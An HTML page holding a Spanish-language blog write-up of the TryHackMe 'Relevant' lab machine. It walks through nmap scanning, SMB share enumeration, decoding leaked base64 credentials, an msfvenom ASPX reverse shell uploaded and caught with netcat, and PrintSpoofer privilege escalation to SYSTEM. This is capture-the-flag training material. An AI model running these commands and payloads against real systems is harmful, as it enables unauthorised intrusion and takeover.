<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="">
<meta name="description" content="Lo primero que tenemos que utilizar es la herramienta &amp;lsquo;nmap&amp;rsquo; para escanear los puertos existentes y saber cuales están abiertos.
Si quieres saber más sobre nmap puedes ir directo a esta room: https://tryhackme.com/room/furthernmap
nmap -sV -T4 -sS -p- 10.10.60.19
Gracias al escaneo podemos observar que se trata de una máquina Windows y que podemos ver sus directorios gracias al servidor samba. Tenemos que tener en cuenta el puerto 49663.
Listamos los directorios de la máquina con samba:" />
<meta name="keywords" content="homepage, blog, science, informatics, programming, hacking, pentesting" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="/posts/relevant/" />


    <title>
        
            [ TRYHACKME ] RELEVANT :: [ H4NS&#39; BLOG ] 
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="/main.d7bdd8ee18bfbf4c605488a7e5b1b92cd980dfeed2bdaeab4dd5e931a7a78bc0.css">






<meta itemprop="name" content="[ TRYHACKME ] RELEVANT">
<meta itemprop="description" content="Lo primero que tenemos que utilizar es la herramienta &lsquo;nmap&rsquo; para escanear los puertos existentes y saber cuales están abiertos.
Si quieres saber más sobre nmap puedes ir directo a esta room: https://tryhackme.com/room/furthernmap
nmap -sV -T4 -sS -p- 10.10.60.19
Gracias al escaneo podemos observar que se trata de una máquina Windows y que podemos ver sus directorios gracias al servidor samba. Tenemos que tener en cuenta el puerto 49663.
Listamos los directorios de la máquina con samba:"><meta itemprop="datePublished" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="dateModified" content="2021-03-28T13:17:53&#43;02:00" />
<meta itemprop="wordCount" content="545"><meta itemprop="image" content="/"/>
<meta itemprop="keywords" content="" />
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="/"/>

<meta name="twitter:title" content="[ TRYHACKME ] RELEVANT"/>
<meta name="twitter:description" content="Lo primero que tenemos que utilizar es la herramienta &lsquo;nmap&rsquo; para escanear los puertos existentes y saber cuales están abiertos.
Si quieres saber más sobre nmap puedes ir directo a esta room: https://tryhackme.com/room/furthernmap
nmap -sV -T4 -sS -p- 10.10.60.19
Gracias al escaneo podemos observar que se trata de una máquina Windows y que podemos ver sus directorios gracias al servidor samba. Tenemos que tener en cuenta el puerto 49663.
Listamos los directorios de la máquina con samba:"/>








    <meta property="article:published_time" content="2021-03-28 13:17:53 &#43;0200 CEST" />








    </head>

    
        <body>
    
    
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">#</span>
            <span class="logo__text">cd /home</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="/about">About me</a></li><li><a href="/posts">Blog</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        3 minutes

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="/posts/relevant/">[ TRYHACKME ] RELEVANT</a>
      </h1>

      

      

      <div class="post-content">
        <p>Lo primero que tenemos que utilizar es la herramienta &lsquo;nmap&rsquo; para escanear los puertos existentes y saber cuales están abiertos.</p>
<p>Si quieres saber más sobre nmap puedes ir directo a esta room: <a href="https://tryhackme.com/room/furthernmap">https://tryhackme.com/room/furthernmap</a></p>
<p><code>nmap -sV -T4 -sS -p- 10.10.60.19</code></p>
<p><img src="https://i.imgur.com/r83DaUW.jpg" alt=""></p>
<p>Gracias al escaneo podemos observar que se trata de una máquina Windows y que podemos ver sus directorios gracias al servidor samba. Tenemos que tener en cuenta el puerto 49663.</p>
<p>Listamos los directorios de la máquina con samba:</p>
<p>Si quieres saber más sobre samba puedes ir directo a esta room, el cual utiliza la herramienta mencionada para resolver la máquina: <a href="https://tryhackme.com/room/kenobi">https://tryhackme.com/room/kenobi</a></p>
<p><code>smbclient -L \\\10.10.60.19\\</code></p>
<p><img src="https://i.imgur.com/xH0GqoE.jpg" alt=""></p>
<p>Vemos que hay un directorio suelto llamado &lsquo;nt4wrksv&rsquo;, vamos a ver que contiene.</p>
<p><code>smbclient \\\\10.10.60.19\\nt4wrksv</code></p>
<p><img src="https://i.imgur.com/Og4OwVG.jpg" alt=""></p>
<p>Listamos  (dir) que contiene el directorio y encontramos un archivo .txt llamado &lsquo;passwords.txt&rsquo;. Lo pasamos a nuestra máquina con el comando get y lo abrimos (cat) para ver que contiene.</p>
<p>Podemos observar que hay dos líneas encriptadas con base64 (encima de las líneas nos pone que lo encriptado tiene una forma de &lsquo;user - password&rsquo;), vamos a desencriptarlas:</p>
<p>Si quieres saber lo básico sobre crypto puedes hacer la tarea 1 de esta room:
<a href="https://tryhackme.com/room/c4ptur3th3fl4g">https://tryhackme.com/room/c4ptur3th3fl4g</a></p>
<p><img src="https://i.imgur.com/GzxzYcg.jpg" alt=""></p>
<p>Si buscamos vulnerabilidades con nmap, obtenemos lo siguiente:</p>
<p><code>nmap -script vuln -p 80,135,445,3389 10.10.60.19</code></p>
<p><img src="https://i.imgur.com/u305M8J.jpg" alt=""></p>
<p>Observamos que existe una vulnerabilidad de REMOTE CODE EXECUTION llamada &lsquo;CVE-2017-0143&rsquo;. Está relacionada con el exploit EternalBlue.</p>
<p>Existe una room en THM el cual toca el exploit EternalBlue a través de metasploit:
<a href="https://tryhackme.com/room/blue">https://tryhackme.com/room/blue</a></p>
<p>Gracias a esto sabemos que en el directorio &lsquo;nt4wrksv&rsquo; se pueden subir archivos sin ningun tipo de problema, por lo tanto vamos a crear con msfvenom una reverse shell con la que acceder a la máquina:</p>
<p><code>msfvenom -l payloads | grep windows | grep reverse | grep shell</code></p>
<p><img src="https://i.imgur.com/srcwGrT.jpg" alt=""></p>
<p><code>msfvenom -p windows/x64/shell_reverse_tcp LHOST=&lt;mi IP&gt; LPORT=4444 -f aspx -o rev.aspx</code></p>
<p><img src="https://i.imgur.com/x708mrw.jpg" alt=""></p>
<p>Ahora que ya la tenemos vamos a subirla al servidor samba a través del comando put:</p>
<p><img src="https://i.imgur.com/eToWjTR.jpg" alt=""></p>
<p>Ahora vamos a dejar el puerto 4444 en escucha:</p>
<p><code>nc -lvnp 4444</code></p>
<p>Despues de estos pasos vamos a ir a la dirección:</p>
<p>http://10.10.20.95:49663/nt4wrksv/rev.aspx</p>
<p><strong>Tuve que restablecer la máquina porque no me daba conectado al servidor samba con la otra IP, por lo tanto cambió la IP el cual ahora será &lsquo;10.10.20.95&rsquo;</strong></p>
<p>Y ya tendremos nuestra reverse shell creada:</p>
<p><img src="https://i.imgur.com/IAz6NJa.jpg" alt=""></p>
<p>Avanzamos a través de los directorios (cd) hasta encontrar la bandera de user.txt, el cual abrimos con el comando &lsquo;more&rsquo;:</p>
<p><img src="https://i.imgur.com/cuAk5QF.jpg" alt=""></p>
<p>Para encontrar la segunda bandera (root.txt) vamos a necesitar hacer una escalada de privilegios a través de la herramienta PrintSpoofer (esto lo sabemos porque si lanzamos el comando whoami /priv, el usuario tiene el token &lsquo;SeImpersonatePrivilege&rsquo; habilitado) la cual se puede clonar desde este enlace:</p>
<p><a href="https://github.com/dievus/printspoofer">https://github.com/dievus/printspoofer</a></p>
<p>Y para clonar el repositorio en nuestra máquina:</p>
<p><code>git clone https://github.com/dievus/printspoofer</code></p>
<p>Una vez la tengamos clonada, vamos a subir al servidor samba el archivo PrintSpoofer.exe:</p>
<p><code>put PrintSpoofer.exe</code></p>
<p>Despues de esto nos vamos al directorio nt4wrksv, el cual esta situado en &lsquo;C:\inetpub\wwwroot\nt4wrksv&rsquo; en la reverse shell donde podemos encontrar el archivo .exe listo para ser ejecutado a través del comando:</p>
<p><code>PrintSpoofer.exe -i -c cmd</code></p>
<p>Para crear una shell.</p>
<p><img src="https://i.imgur.com/loRSM58.jpg" alt=""></p>
<p>Listo, ya hemos escalado privilegios, ahora si lanzamos un &lsquo;whoami&rsquo; vamos a poder ver que somos el usuario nt authority\system (root).</p>
<p>Ahora solos nos queda ir a por la bandera root.txt:</p>
<p><img src="https://i.imgur.com/xxlPj4m.jpg" alt=""></p>
<p>Espero que os haya gustado la máquina y el write-up!</p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
      

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        545 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2021-03-28 13:17 &#43;0200
        

         
          
        
      </p>
    </div>

    
    <div class="pagination">
        <div class="pagination__title">
            <span class="pagination__title-h"></span>
            <hr />
        </div>

        <div class="pagination__buttons">
            
            <span class="button previous">
                <a href="/posts/internal/">
                    <span class="button__icon">←</span>
                    <span class="button__text">[ TRYHACKME ] INTERNAL</span>
                </a>
            </span>
            

            
        </div>
    </div>


    

    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2021</span>
            
            <span><a href="/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
            <span>Powered by <a href="http://gohugo.io">Hugo</a></span>
            <span>Made with &#10084; by <a href="https://github.com/rhazdon">Djordje Atlialp</a></span>
          </div>
    </div>
</footer>

            
        </div>

        



<script type="text/javascript" src="/bundle.min.2ce64ea6ea44a72b13dd812fc2eb5cca3efe878cce258a47c137c17edf46e0602a05e422b618a5b80b5939c731b7a293351c2f2222a21f6ee27e54a8448dd20e.js" integrity="sha512-LOZOpupEpysT3YEvwutcyj7&#43;h4zOJYpHwTfBft9G4GAqBeQithiluAtZOccxt6KTNRwvIiKiH27iflSoRI3SDg=="></script>



    </body>
</html>
